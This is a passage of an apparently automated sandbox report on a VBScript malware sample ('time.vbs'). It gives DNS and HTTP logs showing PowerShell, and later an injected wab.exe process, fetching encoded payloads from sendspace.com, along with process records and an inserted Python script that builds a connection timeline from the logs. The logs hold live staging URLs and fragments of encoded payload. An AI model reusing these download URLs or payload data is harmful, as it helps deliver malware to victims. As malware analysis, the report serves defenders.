Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 23, 2024 18:24:05.844877005 CEST | 192.168.2.4 | 1.1.1.1 | 0x6433 | Standard query (0) | www.sendspace.com | A (IP address) | IN (0x0001) | false
May 23, 2024 18:24:06.893080950 CEST | 192.168.2.4 | 1.1.1.1 | 0x7935 | Standard query (0) | fs13n4.sendspace.com | A (IP address) | IN (0x0001) | false
May 23, 2024 18:25:00.102287054 CEST | 192.168.2.4 | 1.1.1.1 | 0xbba1 | Standard query (0) | fs12n1.sendspace.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 23, 2024 18:24:05.856153011 CEST | 1.1.1.1 | 192.168.2.4 | 0x6433 | No error (0) | www.sendspace.com | | 172.67.170.105 | A (IP address) | IN (0x0001) | false
May 23, 2024 18:24:05.856153011 CEST | 1.1.1.1 | 192.168.2.4 | 0x6433 | No error (0) | www.sendspace.com | | 104.21.28.80 | A (IP address) | IN (0x0001) | false
May 23, 2024 18:24:06.964212894 CEST | 1.1.1.1 | 192.168.2.4 | 0x7935 | No error (0) | fs13n4.sendspace.com | | 69.31.136.57 | A (IP address) | IN (0x0001) | false
May 23, 2024 18:25:00.157999992 CEST | 1.1.1.1 | 192.168.2.4 | 0xbba1 | No error (0) | fs12n1.sendspace.com | | 69.31.136.53 | A (IP address) | IN (0x0001) | false
                                                      • www.sendspace.com
                                                      • fs13n4.sendspace.com
                                                      • fs12n1.sendspace.com
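The packet and DNS tables above are easier to reason about as a per-connection timeline: which host port talked to which server, under which resolved name, for how long, and how much silence sat between connections (the roughly 50 seconds between the first download and the second stage's fetch is where the report's "sleep" signatures live). The script below is an added example, not part of the report; its input is a constructed subset of the report's own TCP and DNS rows (first and last packet of each connection), and it assumes the column order timestamp, zone, source port, dest port, source IP, dest IP.

```python
"""Connection timeline from a sandbox packet table, annotated with the names
the sample resolved (a passive-DNS view of the capture).

Added example, not part of the report. The rows below are a constructed
subset copied from the report's TCP and DNS tables; the column order is
assumed from the table header."""
from datetime import datetime

ANALYSIS_HOST = "192.168.2.4"  # the sandbox VM's address as shown in the report

# Constructed subset of the DNS answer table: (name, A record)
DNS_ANSWERS = [
    ("www.sendspace.com", "172.67.170.105"),
    ("www.sendspace.com", "104.21.28.80"),
    ("fs13n4.sendspace.com", "69.31.136.57"),
    ("fs12n1.sendspace.com", "69.31.136.53"),
]

# Constructed subset of the TCP table: first and last packet of each of the
# three connections that appear in this section of the report.
TCP_ROWS = """\
May 23, 2024 18:24:08.692620993 CEST 443 49731 69.31.136.57 192.168.2.4
May 23, 2024 18:24:08.781132936 CEST 49731 443 192.168.2.4 69.31.136.57
May 23, 2024 18:24:58.788613081 CEST 49739 443 192.168.2.4 172.67.170.105
May 23, 2024 18:25:00.086738110 CEST 443 49739 172.67.170.105 192.168.2.4
May 23, 2024 18:25:00.158967018 CEST 49740 443 192.168.2.4 69.31.136.53
May 23, 2024 18:25:01.810904026 CEST 49740 443 192.168.2.4 69.31.136.53
"""


def parse_row(line):
    """One packet row -> (timestamp, sport, dport, sip, dip). The sandbox
    prints nine fractional digits; datetime holds six, so truncate."""
    mon, day, year, clock, _zone, sport, dport, sip, dip = line.split()
    hms, frac = clock.split(".")
    ts = datetime.strptime(f"{mon} {day} {year} {hms}.{frac[:6]}",
                           "%b %d, %Y %H:%M:%S.%f")
    return ts, int(sport), int(dport), sip, dip


def connection_timeline(rows, dns_answers, host=ANALYSIS_HOST):
    """Group packets by (host port, server IP, server port), order the
    connections by first packet and label each server with the name it
    was resolved from."""
    ip_to_name = {ip: name for name, ip in dns_answers}
    flows = {}
    for line in rows.strip().splitlines():
        ts, sport, dport, sip, dip = parse_row(line)
        if sip == host:                      # outbound packet
            key, direction = (sport, dip, dport), "out"
        else:                                # inbound packet
            key, direction = (dport, sip, sport), "in"
        f = flows.setdefault(key, {"first": ts, "last": ts, "out": 0, "in": 0})
        f["first"], f["last"] = min(f["first"], ts), max(f["last"], ts)
        f[direction] += 1
    timeline = []
    for (cport, server, sport), f in sorted(flows.items(), key=lambda kv: kv[1]["first"]):
        timeline.append({
            "client_port": cport, "server": server, "server_port": sport,
            "name": ip_to_name.get(server, "(no DNS answer seen)"),
            "packets": f["out"] + f["in"], "first": f["first"], "last": f["last"],
            "seconds": (f["last"] - f["first"]).total_seconds(),
        })
    return timeline


def idle_gaps(timeline):
    """Silence between the end of one connection and the start of the next.
    A long gap between stages is where a sleep-based evasion sits."""
    return [round((b["first"] - a["last"]).total_seconds(), 3)
            for a, b in zip(timeline, timeline[1:])]


if __name__ == "__main__":
    tl = connection_timeline(TCP_ROWS, DNS_ANSWERS)
    for f in tl:
        print(f"{f['first'].time()}  {ANALYSIS_HOST}:{f['client_port']} -> "
              f"{f['server']}:{f['server_port']}  {f['name']:<22} "
              f"{f['packets']} pkts, {f['seconds']:.3f}s")
    print("idle gaps between connections (s):", idle_gaps(tl))
```

Run against the full table the same code yields the packet counts per connection; on the subset here it shows the three connections in order (fs13n4.sendspace.com, www.sendspace.com, fs12n1.sendspace.com) and an idle gap of about 50 seconds before the second one.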
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 172.67.170.105 | 443 | 2656 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-23 16:24:06 UTC | 174 | OUT | GET /pro/dl/exw2o1 HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Host: www.sendspace.com
                                                      Connection: Keep-Alive
2024-05-23 16:24:06 UTC | 942 | IN | HTTP/1.1 301 Moved Permanently
                                                      Date: Thu, 23 May 2024 16:24:06 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: SID=tabm3uo2s6panln21pglgugjs5; path=/; domain=.sendspace.com
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Pragma: no-cache
                                                      Location: https://fs13n4.sendspace.com/dlpro/34b20cf0440cef8a4c2d2511415a2b43/664f6da6/exw2o1/Croutons.xtp
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2r0nRNYqO3g9pA9HpHpsb5ItWCSd1Fdj%2FT7RnkdFPFy2%2FzQpNKbOE9LDYdPsDr%2FgPllSjfriCeA2W%2BYd1sv5ZdhahA78wYxY5Ehzy9NVxpLrdpE%2BuCjXgCu9xvPRpozhHTyocw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 888664f02cc7192c-EWR
                                                      alt-svc: h3=":443"; ma=86400
2024-05-23 16:24:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 69.31.136.57 | 443 | 2656 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-23 16:24:07 UTC | 231 | OUT | GET /dlpro/34b20cf0440cef8a4c2d2511415a2b43/664f6da6/exw2o1/Croutons.xtp HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Host: fs13n4.sendspace.com
                                                      Connection: Keep-Alive
2024-05-23 16:24:08 UTC | 497 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 23 May 2024 16:24:08 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 461284
                                                      Last-Modified: Wed, 15 May 2024 07:58:08 GMT
                                                      Connection: close
                                                      Set-Cookie: SID=n5q4jmb62ohugf57lv4oa1ja81; path=/; domain=.sendspace.com
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Content-Disposition: attachment;filename="Croutons.xtp"
                                                      ETag: "66446b10-709e4"
                                                      Accept-Ranges: bytes
2024-05-23 16:24:08 UTC | 15887 | IN | Data Raw: 36 77 4c 56 66 33 45 42 6d 37 73 33 75 42 67 41 63 51 47 62 36 77 49 58 6c 51 4e 63 4a 41 52 78 41 5a 76 72 41 75 46 4a 75 55 59 2f 6c 64 6a 72 41 6a 51 50 63 51 47 62 67 63 45 43 42 57 66 35 36 77 4c 39 75 6e 45 42 6d 34 48 70 53 45 54 38 30 58 45 42 6d 2b 73 43 5a 34 70 78 41 5a 74 78 41 5a 75 36 58 48 4a 57 36 75 73 43 7a 6a 5a 78 41 5a 74 78 41 5a 74 78 41 5a 73 78 79 6e 45 42 6d 2b 73 43 4c 4c 43 4a 46 41 76 72 41 6d 34 71 36 77 49 75 66 4e 48 69 36 77 4c 51 33 58 45 42 6d 34 50 42 42 4f 73 43 42 4d 37 72 41 6e 63 74 67 66 6d 4a 71 6b 4d 46 66 4d 70 78 41 5a 74 78 41 5a 75 4c 52 43 51 45 36 77 4a 33 69 4f 73 43 56 56 69 4a 77 33 45 42 6d 2b 73 43 2b 6e 32 42 77 30 4e 34 49 77 4e 78 41 5a 74 78 41 5a 75 36 4c 4f 6d 32 4b 2b 73 43 42 74 64 78 41 5a 75
                                                      Data Ascii: 6wLVf3EBm7s3uBgAcQGb6wIXlQNcJARxAZvrAuFJuUY/ldjrAjQPcQGbgcECBWf56wL9unEBm4HpSET80XEBm+sCZ4pxAZtxAZu6XHJW6usCzjZxAZtxAZtxAZsxynEBm+sCLLCJFAvrAm4q6wIufNHi6wLQ3XEBm4PBBOsCBM7rAnctgfmJqkMFfMpxAZtxAZuLRCQE6wJ3iOsCVViJw3EBm+sC+n2Bw0N4IwNxAZtxAZu6LOm2K+sCBtdxAZu
2024-05-23 16:24:08 UTC | 16384 | IN | Data Raw: 46 34 7a 35 7a 59 4b 51 4b 4d 51 5a 79 48 68 56 41 61 6b 75 69 54 34 41 57 2f 63 7a 6d 30 64 6d 7a 4c 68 53 5a 61 37 56 65 69 6e 6e 67 58 39 79 49 79 59 52 61 33 2b 79 6d 67 6d 63 7a 4e 68 49 31 65 67 64 50 73 4d 59 49 54 32 38 74 43 45 39 76 4c 51 68 50 62 79 30 49 54 32 38 74 43 45 39 76 4c 51 67 51 46 67 2b 70 38 51 63 62 78 6f 44 6b 6b 48 4e 4e 62 79 33 67 43 68 73 70 43 49 4d 32 43 48 47 75 66 78 32 2b 74 37 51 53 41 45 64 52 66 34 4b 78 58 39 71 65 2b 4d 53 4e 2f 77 51 4a 37 4d 54 41 33 34 6d 4d 51 73 36 54 64 48 4a 47 32 34 42 77 5a 33 54 6a 6e 50 72 56 6d 68 7a 65 47 47 45 52 63 49 6c 7a 58 47 6d 6f 4d 56 62 76 53 77 65 49 58 43 30 49 54 32 38 74 43 45 39 76 4c 51 68 50 62 79 30 49 54 32 38 74 43 45 39 76 4c 56 32 43 54 2f 6d 78 4a 4a 55 46 35 58
                                                      Data Ascii: F4z5zYKQKMQZyHhVAakuiT4AW/czm0dmzLhSZa7VeinngX9yIyYRa3+ymgmczNhI1egdPsMYIT28tCE9vLQhPby0IT28tCE9vLQgQFg+p8QcbxoDkkHNNby3gChspCIM2CHGufx2+t7QSAEdRf4KxX9qe+MSN/wQJ7MTA34mMQs6TdHJG24BwZ3TjnPrVmhzeGGERcIlzXGmoMVbvSweIXC0IT28tCE9vLQhPby0IT28tCE9vLV2CT/mxJJUF5X
2024-05-23 16:24:08 UTC | 16384 | IN | Data Raw: 6a 79 54 36 4f 76 52 32 4a 2b 69 77 76 43 45 39 75 73 75 6c 71 50 35 56 33 49 74 7a 53 50 5a 63 74 6a 69 70 4b 4e 76 7a 6e 62 54 6d 78 67 61 6c 6d 4b 35 56 32 6b 56 67 52 42 65 78 65 58 64 39 6e 42 72 68 2b 45 49 31 69 72 56 31 53 56 34 33 6d 47 63 38 66 50 74 39 58 4a 56 75 65 33 55 64 35 38 54 76 4f 6b 63 4a 59 58 45 35 7a 69 54 49 66 35 68 68 50 62 79 4b 48 33 51 4d 70 43 42 65 6a 2b 67 42 50 36 55 6a 6a 63 34 71 4e 45 76 62 61 57 48 4a 31 75 61 61 34 6b 71 6b 76 74 7a 55 35 63 5a 4c 5a 4c 36 54 52 37 6a 34 57 76 51 78 74 4c 51 68 41 36 6d 6e 77 73 4a 44 68 44 32 75 6b 6a 59 4b 56 68 4a 43 4a 4b 69 7a 50 2f 74 53 73 31 71 30 41 67 57 74 70 71 67 37 71 62 6b 38 35 6b 33 62 6f 39 4f 79 4a 6f 58 39 52 79 4c 6e 75 36 78 34 62 4b 6d 69 4a 69 59 2f 67 31 36
                                                      Data Ascii: jyT6OvR2J+iwvCE9usulqP5V3ItzSPZctjipKNvznbTmxgalmK5V2kVgRBexeXd9nBrh+EI1irV1SV43mGc8fPt9XJVue3Ud58TvOkcJYXE5ziTIf5hhPbyKH3QMpCBej+gBP6Ujjc4qNEvbaWHJ1uaa4kqkvtzU5cZLZL6TR7j4WvQxtLQhA6mnwsJDhD2ukjYKVhJCJKizP/tSs1q0AgWtpqg7qbk85k3bo9OyJoX9RyLnu6x4bKmiJiY/g16
2024-05-23 16:24:08 UTC | 16384 | IN | Data Raw: 6d 59 59 78 37 75 2f 4c 73 78 43 53 35 6a 64 70 44 53 58 44 69 70 75 6e 75 73 44 69 6a 66 56 42 50 70 49 56 6b 62 53 30 49 39 6a 39 41 42 46 73 2b 6c 49 38 70 44 7a 71 4a 6a 68 4e 64 37 47 62 75 33 48 43 49 36 75 65 4a 6a 75 72 64 4e 6a 73 35 73 59 47 70 62 69 4f 56 4b 65 72 31 66 30 6d 7a 56 4d 69 31 74 52 45 79 4a 4f 30 7a 65 34 30 6d 58 4c 68 56 74 6a 61 31 6b 37 6f 6a 47 42 73 30 4b 36 78 33 30 38 6e 6e 6f 45 6a 67 38 66 30 31 6c 67 39 33 76 33 4f 4d 68 7a 59 69 43 56 66 4d 4c 51 68 50 62 79 30 49 54 32 38 74 43 45 39 76 4c 51 68 50 62 79 30 49 54 32 38 74 57 2f 6d 74 53 58 49 44 65 2b 6b 55 71 44 65 67 67 63 62 61 39 78 66 4b 56 4c 30 67 7a 70 36 7a 6a 31 47 56 65 37 62 35 45 79 2b 57 7a 6f 47 44 51 4a 6d 61 72 4d 37 55 74 30 5a 6a 7a 70 6c 44 53 63
                                                      Data Ascii: mYYx7u/LsxCS5jdpDSXDipunusDijfVBPpIVkbS0I9j9ABFs+lI8pDzqJjhNd7Gbu3HCI6ueJjurdNjs5sYGpbiOVKer1f0mzVMi1tREyJO0ze40mXLhVtja1k7ojGBs0K6x308nnoEjg8f01lg93v3OMhzYiCVfMLQhPby0IT28tCE9vLQhPby0IT28tW/mtSXIDe+kUqDeggcba9xfKVL0gzp6zj1GVe7b5Ey+WzoGDQJmarM7Ut0ZjzplDSc
2024-05-23 16:24:08 UTC | 16384 | IN | Data Raw: 73 4a 67 78 50 68 39 4e 46 54 32 39 37 74 71 67 4a 35 34 54 4f 71 62 7a 49 49 31 4b 73 2f 6a 71 31 38 52 37 4f 6d 61 35 33 69 78 32 73 35 73 48 75 41 71 59 59 38 36 54 76 54 6c 69 77 62 6e 61 6b 56 42 76 69 76 30 54 62 6b 35 68 77 4a 50 7a 5a 53 73 47 41 45 45 58 65 69 48 52 71 44 44 58 70 2b 6c 63 6b 59 79 2f 6f 79 30 4b 2f 55 73 75 59 63 6d 37 4f 6b 52 78 33 45 54 69 53 4e 49 44 53 55 6f 6d 49 6c 6a 2b 4d 78 65 37 71 51 51 37 35 44 34 6d 67 45 51 2f 51 59 7a 2b 78 67 61 39 6d 46 5a 56 33 76 46 67 4f 49 49 6e 31 4d 62 69 37 62 4b 30 4a 56 4e 62 4d 35 56 4d 56 79 4f 75 78 50 48 76 71 67 38 70 59 68 6a 54 41 50 45 7a 55 36 4f 44 6a 78 43 4e 37 42 35 57 4f 47 31 67 6e 4d 66 2b 4d 6d 47 55 55 57 6a 64 4c 4d 5a 38 77 49 67 6c 2b 4d 43 30 49 54 32 38 74 43 45
                                                      Data Ascii: sJgxPh9NFT297tqgJ54TOqbzII1Ks/jq18R7Oma53ix2s5sHuAqYY86TvTliwbnakVBviv0Tbk5hwJPzZSsGAEEXeiHRqDDXp+lckYy/oy0K/UsuYcm7OkRx3ETiSNIDSUomIlj+Mxe7qQQ75D4mgEQ/QYz+xga9mFZV3vFgOIIn1Mbi7bK0JVNbM5VMVyOuxPHvqg8pYhjTAPEzU6ODjxCN7B5WOG1gnMf+MmGUUWjdLMZ8wIgl+MC0IT28tCE
2024-05-23 16:24:08 UTC | 16384 | IN | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-05-23 16:24:08 UTC | 16384 | IN | Data Raw: 50 4f 56 30 71 48 31 66 63 41 78 46 76 68 33 45 2b 42 53 6f 4c 77 35 79 6a 46 75 52 48 55 4c 75 32 6a 42 4b 6b 7a 42 35 75 7a 70 57 77 68 78 63 4a 71 4d 4d 51 35 6d 67 41 51 47 35 77 43 45 39 76 4c 51 68 50 62 79 30 49 54 32 38 74 43 45 39 76 4c 51 68 50 62 79 30 49 54 7a 6f 46 69 53 65 6c 41 4c 77 38 31 6d 4f 63 42 57 65 75 47 52 6a 51 69 53 38 36 5a 61 7a 2f 6e 41 66 43 74 38 36 59 6a 5a 65 36 38 71 7a 2f 78 2b 56 50 53 63 36 59 38 4a 5a 43 42 71 51 2f 55 55 76 67 6f 31 2f 61 69 59 45 45 4d 52 31 52 4c 6f 30 4f 4a 4f 31 67 59 2b 64 6e 74 4f 5a 48 66 66 70 63 61 74 71 37 71 56 4c 56 7a 61 6a 46 72 4c 50 77 6b 62 74 39 4f 30 62 34 51 49 77 7a 45 44 6d 54 78 39 67 6f 6e 49 6d 35 33 33 57 73 6d 75 37 62 6b 44 6d 70 64 49 6d 35 6a 62 4c 4d 55 75 37 62 67 44
                                                      Data Ascii: POV0qH1fcAxFvh3E+BSoLw5yjFuRHULu2jBKkzB5uzpWwhxcJqMMQ5mgAQG5wCE9vLQhPby0IT28tCE9vLQhPby0ITzoFiSelALw81mOcBWeuGRjQiS86Zaz/nAfCt86YjZe68qz/x+VPSc6Y8JZCBqQ/UUvgo1/aiYEEMR1RLo0OJO1gY+dntOZHffpcatq7qVLVzajFrLPwkbt9O0b4QIwzEDmTx9gonIm533Wsmu7bkDmpdIm5jbLMUu7bgD
2024-05-23 16:24:08 UTC | 16384 | IN | Data Raw: 73 56 67 74 50 59 43 33 51 32 57 38 74 43 45 39 76 4c 51 68 50 62 79 30 49 54 32 38 74 43 45 39 76 4c 51 68 50 62 33 76 69 52 65 45 49 4f 4e 6d 6e 71 51 77 75 48 7a 43 2f 2b 4b 30 67 58 52 59 34 6b 69 61 34 6c 70 75 4a 75 4c 44 35 6e 32 66 75 77 6f 58 43 57 59 4b 4a 6f 4e 57 34 50 36 44 6d 49 6a 4a 7a 74 41 65 51 2f 32 77 76 6c 69 6f 72 4d 39 68 4d 72 4d 45 33 67 33 58 6f 61 53 45 62 65 34 61 65 59 51 51 74 41 36 65 65 6b 2f 4e 50 44 6f 78 34 6e 37 66 54 45 4f 7a 72 49 41 37 6d 71 4e 56 4f 62 79 32 42 68 31 53 71 44 45 64 76 4c 59 50 4b 73 69 77 49 54 32 43 6f 35 72 57 51 30 73 51 31 47 55 31 6a 59 49 6f 44 4a 54 72 69 73 33 2b 6a 4b 74 6c 4a 48 65 63 4a 30 57 77 6f 4a 36 6f 44 72 4e 75 6b 63 2b 35 4f 65 39 66 65 67 75 68 37 4e 4f 6c 71 5a 54 2f 42 6c 68
                                                      Data Ascii: sVgtPYC3Q2W8tCE9vLQhPby0IT28tCE9vLQhPb3viReEIONmnqQwuHzC/+K0gXRY4kia4lpuJuLD5n2fuwoXCWYKJoNW4P6DmIjJztAeQ/2wvliorM9hMrME3g3XoaSEbe4aeYQQtA6eek/NPDox4n7fTEOzrIA7mqNVOby2Bh1SqDEdvLYPKsiwIT2Co5rWQ0sQ1GU1jYIoDJTris3+jKtlJHecJ0WwoJ6oDrNukc+5Oe9feguh7NOlqZT/Blh
2024-05-23 16:24:08 UTC | 16384 | IN | Data Raw: 6d 7a 41 46 4f 38 6b 75 4e 74 78 51 6a 75 51 63 32 73 69 4e 4b 61 39 34 48 6d 4c 54 31 64 34 74 62 79 2f 47 6b 54 34 35 76 43 4d 46 50 72 58 32 76 63 56 2f 4b 74 58 53 4d 6f 44 64 39 67 38 72 50 4c 41 68 50 6b 46 67 73 4a 39 77 4d 6a 7a 37 75 47 53 77 49 4a 5a 72 35 48 64 55 62 77 5a 61 2b 72 4f 49 65 64 4e 4d 59 7a 6f 56 44 4e 7a 6e 4a 72 4f 49 34 41 6b 67 53 47 66 4f 6b 37 6b 35 35 73 44 47 34 47 6a 6f 57 39 75 74 33 68 67 4b 4b 4c 32 6a 65 33 64 64 30 38 30 33 61 45 46 37 45 46 66 68 44 4c 47 49 6f 68 6f 67 4f 53 6d 56 50 63 2f 79 6d 7a 4a 62 37 35 7a 78 4a 6e 72 77 6f 59 35 71 4a 6b 71 4b 49 73 74 39 7a 4d 59 34 31 72 43 52 72 4d 49 39 36 73 7a 32 58 76 6e 6f 54 2f 59 6d 39 47 73 72 6c 76 75 37 76 33 36 31 35 4a 59 6d 39 75 4b 66 6d 41 4f 37 66 52 58
                                                      Data Ascii: mzAFO8kuNtxQjuQc2siNKa94HmLT1d4tby/GkT45vCMFPrX2vcV/KtXSMoDd9g8rPLAhPkFgsJ9wMjz7uGSwIJZr5HdUbwZa+rOIedNMYzoVDNznJrOI4AkgSGfOk7k55sDG4GjoW9ut3hgKKL2je3dd0803aEF7EFfhDLGIohogOSmVPc/ymzJb75zxJnrwoY5qJkqKIst9zMY41rCRrMI96sz2XvnoT/Ym9Gsrlvu7v3615JYm9uKfmAO7fRX
                                                      2024-05-23 16:24:08 UTC16384INData Raw: 47 34 51 49 74 6f 4e 6e 46 49 75 76 44 73 77 58 38 56 44 64 46 31 7a 78 30 79 6c 31 52 45 43 50 78 59 30 66 46 73 4f 39 64 34 4f 36 79 61 31 2b 32 71 4c 6b 6a 30 67 6d 6a 7a 51 44 71 70 67 52 2f 65 43 74 36 79 68 5a 49 4b 46 6f 49 70 51 73 47 65 37 5a 73 36 49 36 59 7a 6f 46 6d 66 64 43 56 72 4f 61 58 66 79 6d 65 47 50 4f 6b 37 30 35 59 73 49 32 35 48 6a 66 42 43 47 77 79 34 61 62 45 5a 48 72 74 4e 6a 75 47 69 6e 53 6c 67 78 4a 2f 33 43 63 77 70 48 50 48 54 63 35 6f 79 57 5a 68 6c 63 72 50 6c 48 4a 58 64 34 4e 7a 4d 63 71 2b 4c 41 68 50 35 4b 6a 5a 54 6d 38 74 42 38 74 52 32 76 65 77 71 4b 68 54 54 57 38 74 32 45 41 63 4e 67 64 50 65 42 6f 49 54 32 38 74 43 45 39 76 4c 51 68 50 62 79 30 49 54 32 38 74 43 45 39 76 4c 51 67 47 6b 2f 38 5a 37 6e 59 44 39 47
                                                      Data Ascii: G4QItoNnFIuvDswX8VDdF1zx0yl1RECPxY0fFsO9d4O6ya1+2qLkj0gmjzQDqpgR/eCt6yhZIKFoIpQsGe7Zs6I6YzoFmfdCVrOaXfymeGPOk705YsI25HjfBCGwy4abEZHrtNjuGinSlgxJ/3CcwpHPHTc5oyWZhlcrPlHJXd4NzMcq+LAhP5KjZTm8tB8tR2vewqKhTTW8t2EAcNgdPeBoIT28tCE9vLQhPby0IT28tCE9vLQgGk/8Z7nYD9G


                                                      Session ID:2
                                                      Source IP:192.168.2.4
                                                      Source Port:49739
                                                      Destination IP:172.67.170.105
                                                      Destination Port:443
                                                      PID:3688
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-05-23 16:24:59 UTC | 175 | OUT | GET /pro/dl/dvbcvt HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Host: www.sendspace.com
                                                      Cache-Control: no-cache
                                                      2024-05-23 16:25:00 UTC | 947 | IN | HTTP/1.1 301 Moved Permanently
                                                      Date: Thu, 23 May 2024 16:24:59 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: SID=kasl9f49sokivj0jd0u0img0e2; path=/; domain=.sendspace.com
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Pragma: no-cache
                                                      Location: https://fs12n1.sendspace.com/dlpro/abb1ac42d6f7e317093ecbc9d7acfd44/664f6ddc/dvbcvt/TGFVxUhEOgecNvM13.bin
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O56IZYhyIyj8AYTTQrAFgRDegJC3uAqa1Q9PBDCjLMiXqWcDpjy%2BKDTOGIdRE2tZ2cafwfBGs1opf%2Bon5rb1OM0WyoKSayZ9jnI%2FE2NKHNbuCzVEmddZGpLgdeS2PYLXb0XqcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8886663befd5c345-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-05-23 16:25:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session ID:3
                                                      Source IP:192.168.2.4
                                                      Source Port:49740
                                                      Destination IP:69.31.136.53
                                                      Destination Port:443
                                                      PID:3688
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-05-23 16:25:00 UTC | 305 | OUT | GET /dlpro/abb1ac42d6f7e317093ecbc9d7acfd44/664f6ddc/dvbcvt/TGFVxUhEOgecNvM13.bin HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Cache-Control: no-cache
                                                      Host: fs12n1.sendspace.com
                                                      Connection: Keep-Alive
                                                      Cookie: SID=kasl9f49sokivj0jd0u0img0e2
                                                      2024-05-23 16:25:01 UTC | 431 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 23 May 2024 16:25:01 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 106048
                                                      Last-Modified: Wed, 15 May 2024 07:56:05 GMT
                                                      Connection: close
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Content-Disposition: attachment;filename="TGFVxUhEOgecNvM13.bin"
                                                      ETag: "66446a95-19e40"
                                                      Accept-Ranges: bytes



                                                      Target ID:0
                                                      Start time:12:23:55
                                                      Start date:23/05/2024
                                                      Path:C:\Windows\System32\wscript.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\time.vbs"
                                                      Imagebase:0x7ff6699d0000
                                                      File size:170'496 bytes
                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:1
                                                      Start time:12:24:02
                                                      Start date:23/05/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
